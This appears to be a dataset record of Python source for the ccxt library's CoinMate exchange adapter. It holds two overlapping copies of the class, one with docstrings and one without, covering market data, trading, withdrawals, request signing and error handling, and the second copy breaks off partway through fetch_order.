amount = self.safe_number(transaction, 'amount')
fee = self.safe_number(transaction, 'fee')
txid = self.safe_string(transaction, 'txid')
address = self.safe_string(transaction, 'destination')
tag = self.safe_string(transaction, 'destinationTag')
currencyId = self.safe_string(transaction, 'amountCurrency')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'transferType')
status = self.parse_transaction_status(self.safe_string(transaction, 'transferStatus'))
id = self.safe_string_2(transaction, 'transactionId', 'id')
network = self.safe_string(transaction, 'walletType')
return {
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'currency': code,
'amount': amount,
'type': type,
'txid': txid,
'network': network,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'status': status,
'fee': {
'cost': fee,
'currency': code,
},
'info': transaction,
}
def withdraw(self, code, amount, address, tag=None, params={}):
"""
make a withdrawal
:param str code: unified currency code
:param float amount: the amount to withdraw
:param str address: the address to withdraw to
:param str|None tag:
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a `transaction structure <https://docs.ccxt.com/en/latest/manual.html#transaction-structure>`
"""
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
self.load_markets()
currency = self.currency(code)
withdrawOptions = self.safe_value(self.options, 'withdraw', {})
methods = self.safe_value(withdrawOptions, 'methods', {})
method = self.safe_string(methods, code)
if method is None:
allowedCurrencies = list(methods.keys())
raise ExchangeError(self.id + ' withdraw() only allows withdrawing the following currencies: ' + ', '.join(allowedCurrencies))
request = {
'amount': self.currency_to_precision(code, amount),
'address': address,
}
if tag is not None:
request['destinationTag'] = tag
response = getattr(self, method)(self.extend(request, params))
#
# {
# "error": False,
# "errorMessage": null,
# "data": {
# "id": "9e0a37fc-4ab4-4b9d-b9e7-c9c8f7c4c8e0"
# }
# }
#
data = self.safe_value(response, 'data')
transaction = self.parse_transaction(data, currency)
fillResponseFromRequest = self.safe_value(withdrawOptions, 'fillResponseFromRequest', True)
if fillResponseFromRequest:
transaction['amount'] = amount
transaction['currency'] = code
transaction['address'] = address
transaction['tag'] = tag
transaction['type'] = 'withdrawal'
transaction['status'] = 'pending'
return transaction
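    # Dispatch example (illustrative): withdraw('BTC', ...) resolves
    # methods['BTC'] == 'privatePostBitcoinWithdrawal' and calls it via
    # getattr(self, method); a code outside the map, e.g. 'DOGE', raises the
    # ExchangeError above listing the supported currencies.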
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
"""
fetch all trades made by the user
:param str|None symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch trades for
:param int|None limit: the maximum number of trades structures to retrieve
:param dict params: extra parameters specific to the coinmate api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html#trade-structure>`
"""
self.load_markets()
if limit is None:
limit = 1000
request = {
'limit': limit,
}
if symbol is not None:
market = self.market(symbol)
request['currencyPair'] = market['id']
if since is not None:
request['timestampFrom'] = since
response = self.privatePostTradeHistory(self.extend(request, params))
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, None, since, limit)
def parse_trade(self, trade, market=None):
#
# fetchMyTrades(private)
#
# {
# transactionId: 2671819,
# createdTimestamp: 1529649127605,
# currencyPair: 'LTC_BTC',
# type: 'BUY',
# orderType: 'LIMIT',
# orderId: 101810227,
# amount: 0.01,
# price: 0.01406,
# fee: 0,
# feeType: 'MAKER'
# }
#
# fetchTrades(public)
#
# {
# "timestamp":1561598833416,
# "transactionId":"4156303",
# "price":10950.41,
# "amount":0.004,
# "currencyPair":"BTC_EUR",
# "tradeType":"BUY"
# }
#
marketId = self.safe_string(trade, 'currencyPair')
market = self.safe_market(marketId, market, '_')
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
side = self.safe_string_lower_2(trade, 'type', 'tradeType')
type = self.safe_string_lower(trade, 'orderType')
orderId = self.safe_string(trade, 'orderId')
id = self.safe_string(trade, 'transactionId')
timestamp = self.safe_integer_2(trade, 'timestamp', 'createdTimestamp')
fee = None
feeCostString = self.safe_string(trade, 'fee')
if feeCostString is not None:
fee = {
'cost': feeCostString,
'currency': market['quote'],
}
takerOrMaker = self.safe_string(trade, 'feeType')
takerOrMaker = 'maker' if (takerOrMaker == 'MAKER') else 'taker'
return self.safe_trade({
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'type': type,
'side': side,
'order': orderId,
'takerOrMaker': takerOrMaker,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
def fetch_trades(self, symbol, since=None, limit=None, params={}):
"""
get the list of most recent trades for a particular symbol
:param str symbol: unified symbol of the market to fetch trades for
:param int|None since: timestamp in ms of the earliest trade to fetch
:param int|None limit: the maximum amount of trades to fetch
:param dict params: extra parameters specific to the coinmate api endpoint
:returns [dict]: a list of `trade structures <https://docs.ccxt.com/en/latest/manual.html?#public-trades>`
"""
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
'minutesIntoHistory': 10,
}
response = self.publicGetTransactions(self.extend(request, params))
#
# {
# "error":false,
# "errorMessage":null,
# "data":[
# {
# "timestamp":1561598833416,
# "transactionId":"4156303",
# "price":10950.41,
# "amount":0.004,
# "currencyPair":"BTC_EUR",
# "tradeType":"BUY"
# }
# ]
# }
#
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def fetch_trading_fee(self, symbol, params={}):
"""
fetch the trading fees for a market
:param str symbol: unified market symbol
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: a `fee structure <https://docs.ccxt.com/en/latest/manual.html#fee-structure>`
"""
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
}
response = self.privatePostTraderFees(self.extend(request, params))
#
# {
# error: False,
# errorMessage: null,
# data: {maker: '0.3', taker: '0.35', timestamp: '1646253217815'}
# }
#
data = self.safe_value(response, 'data', {})
makerString = self.safe_string(data, 'maker')
takerString = self.safe_string(data, 'taker')
maker = self.parse_number(Precise.string_div(makerString, '100'))
taker = self.parse_number(Precise.string_div(takerString, '100'))
return {
'info': data,
'symbol': symbol,
'maker': maker,
'taker': taker,
'percentage': True,
'tierBased': True,
}
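    # Worked example of the conversion above (illustrative): the endpoint
    # reports fees as percentages, e.g. maker '0.3' and taker '0.35' as in the
    # sample response quoted above, and Precise.string_div(..., '100') yields
    # the fractional rates 0.003 and 0.0035 expected by the unified fee structure.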
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetch all unfilled currently open orders
:param str|None symbol: unified market symbol
:param int|None since: the earliest time in ms to fetch open orders for
:param int|None limit: the maximum number of open orders structures to retrieve
:param dict params: extra parameters specific to the coinmate api endpoint
:returns [dict]: a list of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
response = self.privatePostOpenOrders(self.extend({}, params))
extension = {'status': 'open'}
return self.parse_orders(response['data'], None, since, limit, extension)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
"""
fetches information on multiple orders made by the user
:param str symbol: unified market symbol of the market orders were made in
:param int|None since: the earliest time in ms to fetch orders for
        :param int|None limit: the maximum number of order structures to retrieve
        :param dict params: extra parameters specific to the coinmate api endpoint
        :returns [dict]: a list of `order structures <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrders() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
}
# offset param that appears in other parts of the API doesn't appear to be supported here
if limit is not None:
request['limit'] = limit
response = self.privatePostOrderHistory(self.extend(request, params))
return self.parse_orders(response['data'], market, since, limit)
def parse_order_status(self, status):
statuses = {
'FILLED': 'closed',
'CANCELLED': 'canceled',
'PARTIALLY_FILLED': 'open',
'OPEN': 'open',
}
return self.safe_string(statuses, status, status)
def parse_order_type(self, type):
types = {
'LIMIT': 'limit',
'MARKET': 'market',
}
return self.safe_string(types, type, type)
def parse_order(self, order, market=None):
#
# limit sell
#
# {
# id: 781246605,
# timestamp: 1584480015133,
# trailingUpdatedTimestamp: null,
# type: 'SELL',
# currencyPair: 'ETH_BTC',
# price: 0.0345,
# amount: 0.01,
# stopPrice: null,
# originalStopPrice: null,
# marketPriceAtLastUpdate: null,
# marketPriceAtOrderCreation: null,
# orderTradeType: 'LIMIT',
# hidden: False,
# trailing: False,
# clientOrderId: null
# }
#
# limit buy
#
# {
# id: 67527001,
# timestamp: 1517931722613,
# trailingUpdatedTimestamp: null,
# type: 'BUY',
# price: 5897.24,
# remainingAmount: 0.002367,
# originalAmount: 0.1,
# stopPrice: null,
# originalStopPrice: null,
# marketPriceAtLastUpdate: null,
# marketPriceAtOrderCreation: null,
# status: 'CANCELLED',
# orderTradeType: 'LIMIT',
# hidden: False,
# avgPrice: null,
# trailing: False,
# }
#
id = self.safe_string(order, 'id')
timestamp = self.safe_integer(order, 'timestamp')
side = self.safe_string_lower(order, 'type')
priceString = self.safe_string(order, 'price')
amountString = self.safe_string(order, 'originalAmount')
remainingString = self.safe_string_2(order, 'remainingAmount', 'amount')
status = self.parse_order_status(self.safe_string(order, 'status'))
type = self.parse_order_type(self.safe_string(order, 'orderTradeType'))
averageString = self.safe_string(order, 'avgPrice')
marketId = self.safe_string(order, 'currencyPair')
symbol = self.safe_symbol(marketId, market, '_')
clientOrderId = self.safe_string(order, 'clientOrderId')
stopPrice = self.safe_number(order, 'stopPrice')
return self.safe_order({
'id': id,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': priceString,
'stopPrice': stopPrice,
'amount': amountString,
'cost': None,
'average': averageString,
'filled': None,
'remaining': remainingString,
'status': status,
'trades': None,
'info': order,
'fee': None,
}, market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
"""
create a trade order
:param str symbol: unified symbol of the market to create an order in
:param str type: 'market' or 'limit'
:param str side: 'buy' or 'sell'
:param float amount: how much of currency you want to trade in units of base currency
        :param float price: the price at which the order is to be fulfilled, in units of the quote currency, ignored in market orders
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: an `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
self.load_markets()
method = 'privatePost' + self.capitalize(side)
request = {
'currencyPair': self.market_id(symbol),
}
if type == 'market':
if side == 'buy':
request['total'] = self.amount_to_precision(symbol, amount) # amount in fiat
else:
                request['amount'] = self.amount_to_precision(symbol, amount)  # amount in crypto
method += 'Instant'
else:
request['amount'] = self.amount_to_precision(symbol, amount) # amount in crypto
request['price'] = self.price_to_precision(symbol, price)
method += self.capitalize(type)
response = getattr(self, method)(self.extend(request, params))
id = self.safe_string(response, 'data')
return {
'info': response,
'id': id,
}
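    # Method-name dispatch above, spelled out (illustrative):
    #   side='buy',  type='limit'  -> self.privatePostBuyLimit    (endpoint 'buyLimit')
    #   side='sell', type='market' -> self.privatePostSellInstant (endpoint 'sellInstant')
    # matching the private POST endpoints declared in describe().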
def fetch_order(self, id, symbol=None, params={}):
"""
fetches information on an order made by the user
:param str|None symbol: unified symbol of the market the order was made in
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
self.load_markets()
request = {
'orderId': id,
}
market = None
if symbol:
market = self.market(symbol)
response = self.privatePostOrderById(self.extend(request, params))
data = self.safe_value(response, 'data')
return self.parse_order(data, market)
def cancel_order(self, id, symbol=None, params={}):
"""
cancels an open order
:param str id: order id
:param str|None symbol: not used by coinmate cancelOrder()
:param dict params: extra parameters specific to the coinmate api endpoint
:returns dict: An `order structure <https://docs.ccxt.com/en/latest/manual.html#order-structure>`
"""
# {"error":false,"errorMessage":null,"data":{"success":true,"remainingAmount":0.01}}
request = {'orderId': id}
response = self.privatePostCancelOrderWithInfo(self.extend(request, params))
return {
'info': response,
}
def nonce(self):
return self.milliseconds()
def sign(self, path, api='public', method='GET', params={}, headers=None, body=None):
url = self.urls['api'] + '/' + path
if api == 'public':
if params:
url += '?' + self.urlencode(params)
else:
self.check_required_credentials()
nonce = str(self.nonce())
auth = nonce + self.uid + self.apiKey
signature = self.hmac(self.encode(auth), self.encode(self.secret))
body = self.urlencode(self.extend({
'clientId': self.uid,
'nonce': nonce,
'publicKey': self.apiKey,
'signature': signature.upper(),
}, params))
headers = {
'Content-Type': 'application/x-www-form-urlencoded',
}
return {'url': url, 'method': method, 'body': body, 'headers': headers}
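    # Standalone sketch of the signing scheme above (illustrative, outside
    # ccxt; ccxt's self.hmac defaults to SHA-256 with a hex digest). The
    # credentials below are placeholders:
    #
    #   import hashlib, hmac, time
    #   nonce = str(int(time.time() * 1000))
    #   message = (nonce + client_id + public_key).encode()
    #   signature = hmac.new(secret.encode(), message, hashlib.sha256).hexdigest().upper()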
def handle_errors(self, code, reason, url, method, headers, body, response, requestHeaders, requestBody):
if response is not None:
if 'error' in response:
# {"error":true,"errorMessage":"Minimum Order Size 0.01 ETH","data":null}
if response['error']:
message = self.safe_string(response, 'errorMessage')
feedback = self.id + ' ' + message
self.throw_exactly_matched_exception(self.exceptions['exact'], message, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], message, feedback)
raise ExchangeError(self.id + ' ' + self.json(response))
if code > 400:
if body:
feedback = self.id + ' ' + body
self.throw_exactly_matched_exception(self.exceptions['exact'], body, feedback)
self.throw_broadly_matched_exception(self.exceptions['broad'], body, feedback)
raise ExchangeError(feedback) # unknown message
raise ExchangeError(self.id + ' ' + body)
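    # Matching example (illustrative), using the sample payload quoted above:
    # errorMessage "Minimum Order Size 0.01 ETH" has no exact-match key, but
    # the broad key 'Minimum Order Size ' is a substring of it, so
    # throw_broadly_matched_exception raises InvalidOrder with the feedback text.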
| 41.850811
| 155
| 0.517901
|
from ccxt.base.exchange import Exchange
from ccxt.base.errors import ExchangeError
from ccxt.base.errors import AuthenticationError
from ccxt.base.errors import ArgumentsRequired
from ccxt.base.errors import InsufficientFunds
from ccxt.base.errors import InvalidOrder
from ccxt.base.errors import OrderNotFound
from ccxt.base.errors import RateLimitExceeded
from ccxt.base.decimal_to_precision import TICK_SIZE
from ccxt.base.precise import Precise
class coinmate(Exchange):
def describe(self):
return self.deep_extend(super(coinmate, self).describe(), {
'id': 'coinmate',
'name': 'CoinMate',
'countries': ['GB', 'CZ', 'EU'],
'rateLimit': 1000,
'has': {
'CORS': True,
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'addMargin': False,
'cancelOrder': True,
'createOrder': True,
'createReduceOnlyOrder': False,
'fetchBalance': True,
'fetchBorrowRate': False,
'fetchBorrowRateHistories': False,
'fetchBorrowRateHistory': False,
'fetchBorrowRates': False,
'fetchBorrowRatesPerSymbol': False,
'fetchFundingHistory': False,
'fetchFundingRate': False,
'fetchFundingRateHistory': False,
'fetchFundingRates': False,
'fetchIndexOHLCV': False,
'fetchLeverage': False,
'fetchLeverageTiers': False,
'fetchMarkets': True,
'fetchMarkOHLCV': False,
'fetchMyTrades': True,
'fetchOpenInterestHistory': False,
'fetchOpenOrders': True,
'fetchOrder': True,
'fetchOrderBook': True,
'fetchOrders': True,
'fetchPosition': False,
'fetchPositions': False,
'fetchPositionsRisk': False,
'fetchPremiumIndexOHLCV': False,
'fetchTicker': True,
'fetchTrades': True,
'fetchTradingFee': True,
'fetchTradingFees': False,
'fetchTransactions': True,
'reduceMargin': False,
'setLeverage': False,
'setMarginMode': False,
'setPositionMode': False,
'transfer': False,
'withdraw': True,
},
'urls': {
'logo': 'https://user-images.githubusercontent.com/51840849/87460806-1c9f3f00-c616-11ea-8c46-a77018a8f3f4.jpg',
'api': 'https://coinmate.io/api',
'www': 'https://coinmate.io',
'fees': 'https://coinmate.io/fees',
'doc': [
'https://coinmate.docs.apiary.io',
'https://coinmate.io/developers',
],
'referral': 'https://coinmate.io?referral=YTFkM1RsOWFObVpmY1ZjMGREQmpTRnBsWjJJNVp3PT0',
},
'requiredCredentials': {
'apiKey': True,
'secret': True,
'uid': True,
},
'api': {
'public': {
'get': [
'orderBook',
'ticker',
'transactions',
'tradingPairs',
],
},
'private': {
'post': [
'balances',
'bitcoinCashWithdrawal',
'bitcoinCashDepositAddresses',
'bitcoinDepositAddresses',
'bitcoinWithdrawal',
'bitcoinWithdrawalFees',
'buyInstant',
'buyLimit',
'cancelOrder',
'cancelOrderWithInfo',
'createVoucher',
'dashDepositAddresses',
'dashWithdrawal',
'ethereumWithdrawal',
'ethereumDepositAddresses',
'litecoinWithdrawal',
'litecoinDepositAddresses',
'openOrders',
'order',
'orderHistory',
'orderById',
'pusherAuth',
'redeemVoucher',
'replaceByBuyLimit',
'replaceByBuyInstant',
'replaceBySellLimit',
'replaceBySellInstant',
'rippleDepositAddresses',
'rippleWithdrawal',
'sellInstant',
'sellLimit',
'transactionHistory',
'traderFees',
'tradeHistory',
'transfer',
'transferHistory',
'unconfirmedBitcoinDeposits',
'unconfirmedBitcoinCashDeposits',
'unconfirmedDashDeposits',
'unconfirmedEthereumDeposits',
'unconfirmedLitecoinDeposits',
'unconfirmedRippleDeposits',
],
},
},
'fees': {
'trading': {
'tierBased': True,
'percentage': True,
'maker': 0.12 / 100,
'taker': 0.25 / 100,
'tiers': {
'taker': [
[self.parse_number('0'), self.parse_number('0.0035')],
[self.parse_number('10000'), self.parse_number('0.0023')],
[self.parse_number('100000'), self.parse_number('0.0021')],
[self.parse_number('250000'), self.parse_number('0.0020')],
[self.parse_number('500000'), self.parse_number('0.0015')],
[self.parse_number('1000000'), self.parse_number('0.0013')],
[self.parse_number('3000000'), self.parse_number('0.0010')],
[self.parse_number('15000000'), self.parse_number('0.0005')],
],
'maker': [
[self.parse_number('0'), self.parse_number('0.003')],
[self.parse_number('10000'), self.parse_number('0.0011')],
[self.parse_number('100000'), self.parse_number('0.0010')],
[self.parse_number('250000'), self.parse_number('0.0008')],
[self.parse_number('500000'), self.parse_number('0.0005')],
[self.parse_number('1000000'), self.parse_number('0.0003')],
[self.parse_number('3000000'), self.parse_number('0.0002')],
[self.parse_number('15000000'), self.parse_number('0')],
],
},
},
},
'options': {
'withdraw': {
                    'fillResponseFromRequest': True,
'methods': {
'BTC': 'privatePostBitcoinWithdrawal',
'LTC': 'privatePostLitecoinWithdrawal',
'BCH': 'privatePostBitcoinCashWithdrawal',
'ETH': 'privatePostEthereumWithdrawal',
'XRP': 'privatePostRippleWithdrawal',
'DASH': 'privatePostDashWithdrawal',
'DAI': 'privatePostDaiWithdrawal',
},
},
},
'exceptions': {
'exact': {
'No order with given ID': OrderNotFound,
},
'broad': {
'Not enough account balance available': InsufficientFunds,
'Incorrect order ID': InvalidOrder,
'Minimum Order Size ': InvalidOrder,
'TOO MANY REQUESTS': RateLimitExceeded,
'Access denied.': AuthenticationError,
},
},
'precisionMode': TICK_SIZE,
})
def fetch_markets(self, params={}):
response = self.publicGetTradingPairs(params)
data = self.safe_value(response, 'data', [])
result = []
for i in range(0, len(data)):
market = data[i]
id = self.safe_string(market, 'name')
baseId = self.safe_string(market, 'firstCurrency')
quoteId = self.safe_string(market, 'secondCurrency')
base = self.safe_currency_code(baseId)
quote = self.safe_currency_code(quoteId)
symbol = base + '/' + quote
result.append({
'id': id,
'symbol': symbol,
'base': base,
'quote': quote,
'settle': None,
'baseId': baseId,
'quoteId': quoteId,
'settleId': None,
'type': 'spot',
'spot': True,
'margin': False,
'swap': False,
'future': False,
'option': False,
'active': None,
'contract': False,
'linear': None,
'inverse': None,
'contractSize': None,
'expiry': None,
'expiryDatetime': None,
'strike': None,
'optionType': None,
'precision': {
'amount': self.parse_number(self.parse_precision(self.safe_string(market, 'lotDecimals'))),
'price': self.parse_number(self.parse_precision(self.safe_string(market, 'priceDecimals'))),
},
'limits': {
'leverage': {
'min': None,
'max': None,
},
'amount': {
'min': self.safe_number(market, 'minAmount'),
'max': None,
},
'price': {
'min': None,
'max': None,
},
'cost': {
'min': None,
'max': None,
},
},
'info': market,
})
return result
def parse_balance(self, response):
balances = self.safe_value(response, 'data', {})
result = {'info': response}
currencyIds = list(balances.keys())
for i in range(0, len(currencyIds)):
currencyId = currencyIds[i]
code = self.safe_currency_code(currencyId)
balance = self.safe_value(balances, currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'available')
account['used'] = self.safe_string(balance, 'reserved')
account['total'] = self.safe_string(balance, 'balance')
result[code] = account
return self.safe_balance(result)
def fetch_balance(self, params={}):
self.load_markets()
response = self.privatePostBalances(params)
return self.parse_balance(response)
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
request = {
'currencyPair': self.market_id(symbol),
'groupByPriceLimit': 'False',
}
response = self.publicGetOrderBook(self.extend(request, params))
orderbook = response['data']
timestamp = self.safe_timestamp(orderbook, 'timestamp')
return self.parse_order_book(orderbook, symbol, timestamp, 'bids', 'asks', 'price', 'amount')
def fetch_ticker(self, symbol, params={}):
self.load_markets()
request = {
'currencyPair': self.market_id(symbol),
}
response = self.publicGetTicker(self.extend(request, params))
ticker = self.safe_value(response, 'data')
timestamp = self.safe_timestamp(ticker, 'timestamp')
last = self.safe_number(ticker, 'last')
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high'),
'low': self.safe_number(ticker, 'low'),
'bid': self.safe_number(ticker, 'bid'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'ask'),
'vwap': None,
'askVolume': None,
'open': None,
'close': last,
'last': last,
'previousClose': None,
'change': None,
'percentage': None,
'average': None,
'baseVolume': self.safe_number(ticker, 'amount'),
'quoteVolume': None,
'info': ticker,
}
def fetch_transactions(self, code=None, since=None, limit=None, params={}):
self.load_markets()
request = {
'limit': 1000,
}
if limit is not None:
request['limit'] = limit
if since is not None:
request['timestampFrom'] = since
if code is not None:
currency = self.currency(code)
request['currency'] = currency['id']
response = self.privatePostTransferHistory(self.extend(request, params))
items = response['data']
return self.parse_transactions(items, None, since, limit)
def parse_transaction_status(self, status):
statuses = {
'COMPLETED': 'ok',
'WAITING': 'pending',
'SENT': 'pending',
'CREATED': 'pending',
'OK': 'ok',
'NEW': 'pending',
'CANCELED': 'canceled',
}
return self.safe_string(statuses, status, status)
def parse_transaction(self, transaction, currency=None):
timestamp = self.safe_integer(transaction, 'timestamp')
amount = self.safe_number(transaction, 'amount')
fee = self.safe_number(transaction, 'fee')
txid = self.safe_string(transaction, 'txid')
address = self.safe_string(transaction, 'destination')
tag = self.safe_string(transaction, 'destinationTag')
currencyId = self.safe_string(transaction, 'amountCurrency')
code = self.safe_currency_code(currencyId, currency)
type = self.safe_string_lower(transaction, 'transferType')
status = self.parse_transaction_status(self.safe_string(transaction, 'transferStatus'))
id = self.safe_string_2(transaction, 'transactionId', 'id')
network = self.safe_string(transaction, 'walletType')
return {
'id': id,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'currency': code,
'amount': amount,
'type': type,
'txid': txid,
'network': network,
'address': address,
'addressTo': None,
'addressFrom': None,
'tag': tag,
'tagTo': None,
'tagFrom': None,
'status': status,
'fee': {
'cost': fee,
'currency': code,
},
'info': transaction,
}
def withdraw(self, code, amount, address, tag=None, params={}):
tag, params = self.handle_withdraw_tag_and_params(tag, params)
self.check_address(address)
self.load_markets()
currency = self.currency(code)
withdrawOptions = self.safe_value(self.options, 'withdraw', {})
methods = self.safe_value(withdrawOptions, 'methods', {})
method = self.safe_string(methods, code)
if method is None:
allowedCurrencies = list(methods.keys())
raise ExchangeError(self.id + ' withdraw() only allows withdrawing the following currencies: ' + ', '.join(allowedCurrencies))
request = {
'amount': self.currency_to_precision(code, amount),
'address': address,
}
if tag is not None:
request['destinationTag'] = tag
response = getattr(self, method)(self.extend(request, params))
data = self.safe_value(response, 'data')
transaction = self.parse_transaction(data, currency)
fillResponseFromRequest = self.safe_value(withdrawOptions, 'fillResponseFromRequest', True)
if fillResponseFromRequest:
transaction['amount'] = amount
transaction['currency'] = code
transaction['address'] = address
transaction['tag'] = tag
transaction['type'] = 'withdrawal'
transaction['status'] = 'pending'
return transaction
def fetch_my_trades(self, symbol=None, since=None, limit=None, params={}):
self.load_markets()
if limit is None:
limit = 1000
request = {
'limit': limit,
}
if symbol is not None:
market = self.market(symbol)
request['currencyPair'] = market['id']
if since is not None:
request['timestampFrom'] = since
response = self.privatePostTradeHistory(self.extend(request, params))
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, None, since, limit)
def parse_trade(self, trade, market=None):
marketId = self.safe_string(trade, 'currencyPair')
market = self.safe_market(marketId, market, '_')
priceString = self.safe_string(trade, 'price')
amountString = self.safe_string(trade, 'amount')
side = self.safe_string_lower_2(trade, 'type', 'tradeType')
type = self.safe_string_lower(trade, 'orderType')
orderId = self.safe_string(trade, 'orderId')
id = self.safe_string(trade, 'transactionId')
timestamp = self.safe_integer_2(trade, 'timestamp', 'createdTimestamp')
fee = None
feeCostString = self.safe_string(trade, 'fee')
if feeCostString is not None:
fee = {
'cost': feeCostString,
'currency': market['quote'],
}
takerOrMaker = self.safe_string(trade, 'feeType')
takerOrMaker = 'maker' if (takerOrMaker == 'MAKER') else 'taker'
return self.safe_trade({
'id': id,
'info': trade,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'symbol': market['symbol'],
'type': type,
'side': side,
'order': orderId,
'takerOrMaker': takerOrMaker,
'price': priceString,
'amount': amountString,
'cost': None,
'fee': fee,
}, market)
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
'minutesIntoHistory': 10,
}
response = self.publicGetTransactions(self.extend(request, params))
data = self.safe_value(response, 'data', [])
return self.parse_trades(data, market, since, limit)
def fetch_trading_fee(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
}
response = self.privatePostTraderFees(self.extend(request, params))
data = self.safe_value(response, 'data', {})
makerString = self.safe_string(data, 'maker')
takerString = self.safe_string(data, 'taker')
maker = self.parse_number(Precise.string_div(makerString, '100'))
taker = self.parse_number(Precise.string_div(takerString, '100'))
return {
'info': data,
'symbol': symbol,
'maker': maker,
'taker': taker,
'percentage': True,
'tierBased': True,
}
def fetch_open_orders(self, symbol=None, since=None, limit=None, params={}):
response = self.privatePostOpenOrders(self.extend({}, params))
extension = {'status': 'open'}
return self.parse_orders(response['data'], None, since, limit, extension)
def fetch_orders(self, symbol=None, since=None, limit=None, params={}):
if symbol is None:
raise ArgumentsRequired(self.id + ' fetchOrders() requires a symbol argument')
self.load_markets()
market = self.market(symbol)
request = {
'currencyPair': market['id'],
}
if limit is not None:
request['limit'] = limit
response = self.privatePostOrderHistory(self.extend(request, params))
return self.parse_orders(response['data'], market, since, limit)
def parse_order_status(self, status):
statuses = {
'FILLED': 'closed',
'CANCELLED': 'canceled',
'PARTIALLY_FILLED': 'open',
'OPEN': 'open',
}
return self.safe_string(statuses, status, status)
def parse_order_type(self, type):
types = {
'LIMIT': 'limit',
'MARKET': 'market',
}
return self.safe_string(types, type, type)
def parse_order(self, order, market=None):
#
# limit sell
#
# {
# id: 781246605,
# timestamp: 1584480015133,
# trailingUpdatedTimestamp: null,
# type: 'SELL',
# currencyPair: 'ETH_BTC',
# price: 0.0345,
# amount: 0.01,
# stopPrice: null,
# originalStopPrice: null,
# marketPriceAtLastUpdate: null,
# marketPriceAtOrderCreation: null,
# orderTradeType: 'LIMIT',
# hidden: False,
# trailing: False,
# clientOrderId: null
# }
#
# limit buy
#
# {
# id: 67527001,
# timestamp: 1517931722613,
# trailingUpdatedTimestamp: null,
# type: 'BUY',
# price: 5897.24,
# remainingAmount: 0.002367,
# originalAmount: 0.1,
# stopPrice: null,
# originalStopPrice: null,
# marketPriceAtLastUpdate: null,
# marketPriceAtOrderCreation: null,
# status: 'CANCELLED',
# orderTradeType: 'LIMIT',
# hidden: False,
# avgPrice: null,
# trailing: False,
# }
#
id = self.safe_string(order, 'id')
timestamp = self.safe_integer(order, 'timestamp')
side = self.safe_string_lower(order, 'type')
priceString = self.safe_string(order, 'price')
amountString = self.safe_string(order, 'originalAmount')
remainingString = self.safe_string_2(order, 'remainingAmount', 'amount')
status = self.parse_order_status(self.safe_string(order, 'status'))
type = self.parse_order_type(self.safe_string(order, 'orderTradeType'))
averageString = self.safe_string(order, 'avgPrice')
marketId = self.safe_string(order, 'currencyPair')
symbol = self.safe_symbol(marketId, market, '_')
clientOrderId = self.safe_string(order, 'clientOrderId')
stopPrice = self.safe_number(order, 'stopPrice')
return self.safe_order({
'id': id,
'clientOrderId': clientOrderId,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'lastTradeTimestamp': None,
'symbol': symbol,
'type': type,
'timeInForce': None,
'postOnly': None,
'side': side,
'price': priceString,
'stopPrice': stopPrice,
'amount': amountString,
'cost': None,
'average': averageString,
'filled': None,
'remaining': remainingString,
'status': status,
'trades': None,
'info': order,
'fee': None,
}, market)
def create_order(self, symbol, type, side, amount, price=None, params={}):
self.load_markets()
method = 'privatePost' + self.capitalize(side)
request = {
'currencyPair': self.market_id(symbol),
}
if type == 'market':
if side == 'buy':
request['total'] = self.amount_to_precision(symbol, amount) # amount in fiat
else:
                request['amount'] = self.amount_to_precision(symbol, amount)  # amount in crypto
method += 'Instant'
else:
request['amount'] = self.amount_to_precision(symbol, amount) # amount in crypto
request['price'] = self.price_to_precision(symbol, price)
method += self.capitalize(type)
response = getattr(self, method)(self.extend(request, params))
id = self.safe_string(response, 'data')
return {
'info': response,
'id': id,
}
def fetch_order(self, id, symbol=None, params={}):
self.load_markets()
request = {
'orderId': id,
}
market = None
if symbol:
market = self.market(symbol)
